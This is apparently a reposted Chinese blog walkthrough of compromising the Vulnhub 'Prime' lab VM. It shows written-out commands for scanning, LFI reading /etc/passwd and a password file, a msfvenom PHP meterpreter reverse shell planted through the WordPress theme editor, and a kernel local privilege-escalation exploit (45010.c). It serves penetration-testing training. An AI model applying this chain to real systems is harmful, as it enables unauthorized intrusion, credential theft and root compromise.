php mysqll注入靶机,渗透测试实战——prime靶机入侵

最新推荐文章于 2021-05-09 20:47:39 发布
最新推荐文章于 2021-05-09 20:47:39 发布
阅读量214 收藏
点赞数
文章标签: php mysqll注入靶机

原标题:渗透测试实战——prime靶机入侵

Ip:192.168.0.115

Kali:192.168.0.21

安装好的靶机界面

920cfeed208124fe745f13d72717c86e.png

Nmap扫描端口

【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以到合天网安实验室操作实验——Nmap网络扫描

nmap-sV -A 192.168.0.115

46edaca69f38114f40c4f68a6c5fc1f2.png

发现只开了80和22端口,直接从80入口

9d347cc36c19c12665beb97a9d5a6407.png

扫描一下目录文件

dirbhttp://192.168.0.115

1b0b83db851733cdab7c5d86e049892f.png

通过目录扫描得到

http://192.168.0.115/dev

http://192.168.0.115/secret.txt

http://192.168.0.115/index.php

http://192.168.0.115/image.php

http://192.168.0.115/wordpress

我习惯先从wordpress入手

访问看看http://192.168.0.115/wordpress

660f94f3193ba60dd9a8592447928c67.png

对wordpress进行扫描

wpscan--url http://192.168.0.115/wordpress/ --enumerate vt,vp,u

5535f98b3e0f698e78ae2bb9e9cb9c2c.png

对wordpress进行扫描

最后只得到如下信息

主题WordPresstheme in use: twentynineteen

版本WordPressversion 5.2.2 identified (Insecure, released on 2019-06-18).

http://192.168.0.115/wordpress/readme.html

用户victor

没发现可以利用漏洞,直接尝试Wp爆破

6fbb75e1fc953eeed6c97865d2787300.png

没成功

继续访问其余扫描到的文件image.php和index.php差不多

d26ebddc5ab0d3cdb392264bcb98bd40.png

最后在secret.txt文件里发现了提示

c8a4fa5124582fe4773a059d6edc2953.png

4d27398deafe6750ae444c00f77470db.png

根据github的提示用wfuzz进行测试,最后fuzz出来file参数

2fc58e10d1b8095e9c3da4a33c3719bd.png

我猜测是应该存在LFI,直接根据secret.txt文件里面提示的包含location.txt获得下一步提示

http://192.168.0.115/?file=location.txt

75567a3a2f10e9045560df8f9d6879db.png

最近成功得到location.txt内容,里面提示在其他php页面用secrettier360参数,

根据上面dirb得到的image.php进行测试

curlhttp://192.168.0.115/image.php?secrettier360=index.php

先尝试读取index.php发现成功

fe84ad10bfcd50fd64224b1ebfa82b0c.png

尝试读取/etc/passwd

curlhttp://192.168.0.115/image.php?secrettier360=/etc/passwd

488838737d50c29569c43bf6399c3676.png

LFI漏洞利用的方法学习可到合天网安实验室操作实验——LFI漏洞攻击实践

于是继续fuzz,看看有没有什么有价值的文件

wfuzz-w safe6/DownFall-LogList.txt -c --hc 404 --hw 17

http://192.168.0.115/image.php?secrettier360=FUZZ

2432f8a987acf864fae86e2b4aee4ad5.png

本来想找一下wp-config.php文件,fuzz无果回过头来看etc/passwd文件有什么用户,最后又在里面发现了线索(真是细节决定成败啊)

514548110cdb0e706eb5df7c1c92fc5e.png

看看password.txt文件

curlhttp://192.168.0.115/image.php?secrettier360=/home/saket/password.txt

edf8f4da1b5767796806ffb3ffeac6ad.png

试一试ssh密码,发现是错的

1468e809db49a3aa05244f18154a353c.png

试一试前面拿到的wordpress用户

377b24df8e624c9876e1265fdf390136.png

没错,我进来了

fa09803eda86333464a0fc96c7730500.png

接下来直接拿webshell,打开我们最喜欢的主题编辑器

3f62fbf679fa3eab81a80bb3992622df.png

翻了半天,发现只有secret.php可用

于是乎,msf大法要上演了

生成一个payload放进去

msfvenom-p php/meterpreter_reverse_tcp LHOST=192.168.0.21 LPORT=4444 -oshell.php

db866fe4a40d29c23195cc539c6eb055.png

8c390dd92a1b51d3f0a86569e55a8c8c.png

保存之后,打开msf

useexploit/multi/handler

setpayload php/meterpreter_reverse_tcp

setlhost 192.168.0.21

setlport 4444

run

c8703f7a08f803b5ec8cdd1b3bb21aa8.png

浏览器打开

http://192.168.0.115/wordpress/wp-content/themes/twentynineteen/secret.php

3180538c79410b040ec364e23819dce3.png

d20eeeae830e893938c9238709b685bc.png

MSF相关的学习,可到合天网安实验室学习实验——MSFvenom实践,通过该实验了解msfvenom和metasploit的用法,生成符合自己要求的shellcode,并成功利用shellcode,学会如何与metasploit配合使用。点击文末“阅读原文”,开始学习!

接下来就是提权了

用python3-c 'import pty; pty.spawn("/bin/bash")'获取个完整交互的shell

8b82187c9639c5fe090abcc31e8943bd.png

切换到tmp目录,看一下内核准备提权(meterpreter里面sysinfo一样)

5fe50e0aaad25ed5aac26817719daba0.png

回到kali搜索searchsploit16.04 Ubuntu

7f9e3e8817bb95d2dfd343f1f8bc1016.png

我们这里用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权

把45010.c拷到当前目录

cp/usr/share/exploitdb/exploits/linux/local/45010.c ./

编译一下gcc45010.c -o root

90c4977eb303b993a7a710f2b049b260.png

然后exit退回到meterpreter

上传一下编译好的

./root执行一下

2011dae9d19b68bdbbe7cb7fbc277aa6.png

最后进入root目录拿到flag

6c1ebed9d8e8974f58fdd1b9db1c2a3a.png

欢迎各位师傅指点

大家有好的技术原创文章

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!

点击“阅读全文”,预览学习MSFvenom实践 返回搜狐,查看更多

责任编辑:

奇幻森林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php mysql注入靶机_六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机
weixin_39930252的博客
02-02 173
1、搭建Python 2.7.X 和SQLmap环境;2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;3、使用sqlmap 获取当前数据库名称sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
php mysql注入靶机_SQL注入靶机实例
weixin_42365510的博客
01-30 237
打开靶机右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机判断是否存在注入点发现url上有id=1 又是MYSQL数据库 心中窃喜 就可以想到select * from [表] where id=[任何数字]接下来把id=后改成0+1 看看有没有发现果然有戏 发现跟原来界面相同 说明0...
php+mysql快速渗透
weixin_30908941的博客
05-02 174
1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL? 简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。1:...
php mysql注入靶机_billu靶机渗透测试
weixin_32637683的博客
02-28 131
老规矩,主机发现、端口扫描、子目录扫描先走一遍我们现在登录主目录和扫描到的各个子目录,找找有没有什么可疑信息。主页是一个登录页面add目录是一个文件上传页面,上传之后并不知道传到了哪里。还有堡塔的数据库管理页面。当进入test目录时,发现上图中的提示:file字符是空的。根据一个成熟渗透狗的经验(滑稽),可以断定这是一个文件读取/文件下载的页面。先试一个路径叭!果不其然,存在文件下载漏洞。这样就可...
PHPMySQL 渗透笔记
Coisini的博客
05-25 228
渗透PHP+MYSQL站点 TitanRain.Security.Team 教程仅用于群内成...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
js实现获取两个日期之间所有日期的方法
dreamgis的专栏
09-14 1451
<script> function getDate(datestr){ var temp = datestr.split("-"); var date = new Date(temp[0],temp[1],temp[2]); return date; } var start = "2012-3-25"; var end = "2012-4-3"; var startTime = getDate(start); var endTime = getDate(end); ...
渗透测试php靶场,渗透测试靶场初体验
weixin_29055137的博客
03-12 1201
声明本文仅供学习和研究,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,海青实验室及文章作者不承担任何责任。安全狗海青实验室拥有此文章的修改和解释权,如欲转载或传播,必须保证此文的完整性,包括版权声明在内的全部内容,未经海青实验室同意,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。近日得到了红日安全团队制作的一套渗透测试靶场,由于笔者对内网...
kali渗透综合靶机(十)--Raven靶机
W小哥
03-28 2055
一、靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二、Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.129 靶机IP:192.168.212.4 1、主机发现 nmap ...
php mysql入侵_php注入入侵实例
weixin_35636570的博客
02-09 336
听承诺说CASI出2.0了,而且承诺也给了一个有漏洞的地址,正好没事就测试了一下,最近非常郁闷,学不下去,正好今天承诺勾起了我学习php的美好时光,看看自己还能不能搞这样的站吧.过程:承诺给的地址是http://www.gametea.com//showboard.php?id=282很标准的php注入形式,我们也按照标准的php注入方法来进行注入,首先再后面加一个',http://www.gam...
PHP开始学渗透 -- MySQL数据库操作
weixin_41489908的博客
05-09 219
有啥别有病,没啥别没钱,毕业这些年,我却掏不出给自己治病的钱。。。 ​---- 网易云热评 1、连接数据库 $lj=mysql_connect("127.0.0.1",'root','root'); 2、判断是否连接成功,连接失败返回false var_dump($lj); 3、数据库操作,增添改查 <?php$lj=mysql_connect("127.0.0.1",'root','root');//连接数据库var_dump($lj);echo "<br/>..
php mysql函数注入_渗透学习笔记之php+ mysql注入(二)
weixin_30811273的博客
01-19 181
1如果权限为root或者比较大的权限,可以尝试跨裤注入,一般适用在站群2php绕过安全机制php安全函数 1 有哪些 2 作用 3 注入时的特征 4 可不可以绕过1. addslashesaddslashes 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。一个使用 addslashes() ...
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
“人力资源+大数据+薪酬报告+涨薪调薪”
07-22
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
安装graphviz和pygraphviz
07-22
pygraphviz 是一个Python库,它是Graphviz图形可视化软件的Python接口。Graphviz是一个开源的图形可视化软件,广泛用于创建和编辑有向图和无向图。pygraphviz使得Python开发者能够轻松地创建和操作图形,以及执行图形的布局和可视化。 一、pygraphviz的主要功能 创建和编辑图形:pygraphviz允许开发者通过Python代码来创建图形,包括添加节点、边等元素,并且可以编辑这些元素的属性,如颜色、形状、标签等。 图形布局:pygraphviz支持多种图形布局算法,如dot、neato、circo等,开发者可以根据需要选择合适的算法来优化图形的布局。 图形可视化:pygraphviz可以将创建和编辑好的图形保存为图片文件,支持多种图片格式,如PNG、JPEG等,方便开发者进行展示和分享。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值